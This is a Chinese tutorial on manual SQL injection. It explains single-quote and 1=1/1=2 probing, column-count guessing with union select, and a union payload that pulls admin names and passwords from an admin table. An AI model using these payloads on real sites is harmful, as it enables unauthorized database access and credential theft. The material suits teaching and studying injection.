假设的目标网站 http://www.chts.cn/info.php?articleid=123（实际不可注入）当articleid 变量取值为123 时，我们假设一下在服务器中会有怎样的代码运行？1. SELECT * /* Select 函数读取信息*/2. FROM infotable /* 从products 数据表中*/3. WHERE id='123';/* false condition 满足条件时*//*XXXX*/是注释符号，当程序运行时，/**/和中间的部分计算机会自动忽略。实际系统执行的代码是这样的：1. select * from infotable where id = '123';在这里，id 的取值是通过url 取值得来的“123”，那么如果我这样呢：info.php?articleid=123'后面多了一个单引号，那么比较一下系统原本执行的语句有什么变化：1. select * from infotable where id = 123;2. select * from infotable where id = 123';最后多了一个引号，语法错误。注：计算机编程得不到想要的结果，错误分两种，一种是语法错误，一种是逻辑错误。后面认真阅读你会慢慢明白区别开的这也就是为什么判断是否为注入点的第一步要在网址后面加单引号的原因了（加单引号出错不能确定网址为注入点，只是判断的一个步骤而已于是后面的1=1 和1=2 的目的也就清楚了1. select * from infotable where id = 123;2. select * from infotable where id = 123 and 1 = 1;//事实上1 就是1，所以应该返回正常页面3. select * from infotable where id = 123 and 1 = 2;//事实上，计算机中1 永远也不等于2，发生逻辑错误，所以返回错误页面手工注入通常会使用联合查询函数union 下面讲一下union 的用法union 注入的第一步通常是猜字段数假设注入点是新闻页面，那么页面中执行的SQL 语句就是：1. select title,date,author,news,comm from news where id = 12;当你进行union 注入的时候，union 前面的语句和union 后面的语句，都是一个完整的SQL语句，是可以单独执行的语句但是，必须保证前后的字段数相同，例如上面这个语句1. select title,date,author,news,comm from news where id = 12;2. select title,date,author,news,comm from news where id = 12 union selectname,password,3,4,5 from admin;3. //news 是新闻表段，admin 是管理员信息表段4. //管理员信息表段明显没有union 前面news 表段里面包含的字段数多所以使用数字3 到5 替代，数字无固定格式，可以使1 2 和3，也可以是111111 和4435435或者干脆用null 空来代替所以，上面的注入语句在实际中就是这么构造：1. info.php?id=12+union+select+name,password,3,4,5+from+admin2. //SQL 注入中，加号用来代表空格的意思，因为有些浏览器会自动将空格转换成%20，如果union 前面是5 个，而union 后面不是5 个，则会发生逻辑错误，显示错误页面。由于程序员编写的程序我们并不知道他在数据库中设置了几个字段，所以通常我们都是先进行字段数的猜测，也就是：1. info.php?id=12+union+select+12. info.php?id=12+union+select+1,23. info.php?id=12+union+select+1,2,34. info.php?id=12+union+select+1,2,3,45. info.php?id=12+union+select+1,2,3,4,56. //你也可以用order by 来猜，用法可以自己搜一下一直这样猜到正确页面出来，没有了逻辑错误，也就表示字段数一致了，然后。。。后面。。。这里仅仅提供思路。。。